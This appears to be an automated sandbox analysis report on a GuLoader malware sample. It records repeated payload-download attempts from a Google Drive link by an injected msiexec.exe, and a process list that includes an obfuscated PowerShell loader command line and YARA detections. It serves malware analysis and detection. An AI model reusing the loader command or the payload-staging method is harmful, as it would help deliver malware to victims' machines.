                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-nrBamg_ECE3uN66YAzQLIQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              67 | 192.168.2.8 | 49776 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:03:08 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:08 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFiumC47fJW4dYsaXMBnE0lJ0bde3xkcnqq7dHXwlcullPlaVQRPvSU8jNTWeRMnn4FBM958
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:08 GMT
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-g18axqFTU6km4TQ4ooILWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:03:08 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_piDKJayh16BxLYTzYSYog">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              68 | 192.168.2.8 | 49777 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:03:09 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:09 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:09 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-R8aZS3jT-e9g-xIvd5VpUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              69 | 192.168.2.8 | 49778 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:03:10 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:11 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgSfRdy_Jbp2fNRbbCD7NFphQxlphDceFU5Q06zU09coeGYWY82xAYgUm3G7FpG4LH8CShgiMjc
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:10 GMT
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-Lb_sSDRAtE5fEM40WWvXfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:03:11 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lmd_yQp11_3SYNo6AxpHfA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              70 | 192.168.2.8 | 49779 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:03:11 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:12 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:12 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-gO1BjmGYRXhkgYo7chfo8A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              71 | 192.168.2.8 | 49780 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:03:13 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:14 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFiumC4PBI66ARl4aJKaGefMJ_PHjQ9MB8y-iH37QoOTLHvGr8Du0r0BnjJ2rDI5PTroErrXCf6aXTI
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:13 GMT
                                                              Content-Security-Policy: script-src 'nonce-wb0DFSVoOu-se2kCgfI-wA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:03:14 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WHDXAGARXzZoRt9wSxqnyA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              72 | 192.168.2.8 | 49781 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:03:14 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:15 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:15 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-N2R8-UTTjECyrSgbxPYDxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              73 | 192.168.2.8 | 49782 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:03:15 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:16 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgQjhCxz4CKte9yQ-Z2gINnO46n2F2S1ddsHOre1OHL0AXygekP-wpwTFQpvHuqCVwtF
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:16 GMT
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: script-src 'nonce-n2daCCKKUbSM_DwFGkO4GQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:03:16 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="x07hwu68ndnJbGseYrrAUQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Target ID:0
                                                              Start time:18:01:08
                                                              Start date:10/01/2025
                                                              Path:C:\Users\user\Desktop\TVPfW4WUdj.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\TVPfW4WUdj.exe"
                                                              Imagebase:0x400000
                                                              File size:859'801 bytes
                                                              MD5 hash:5DEC892FCAF6F21AC6780C69F631F82C
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:2
                                                              Start time:18:01:15
                                                              Start date:10/01/2025
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"powershell.exe" -windowstyle minimized "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.SubString(50063,3);.$Karikeringerne78($Filicoid)"
                                                              Imagebase:0x7b0000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1781252589.000000000A374000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:3
                                                              Start time:18:01:15
                                                              Start date:10/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:7
                                                              Start time:18:01:45
                                                              Start date:10/01/2025
                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                              Imagebase:0x720000
                                                              File size:59'904 bytes
                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.2661194576.00000000047B4000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:false

                                                                Execution Graph

                                                                Execution Coverage:22.1%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:20.8%
                                                                Total number of Nodes:1356
                                                                Total number of Limit Nodes:32
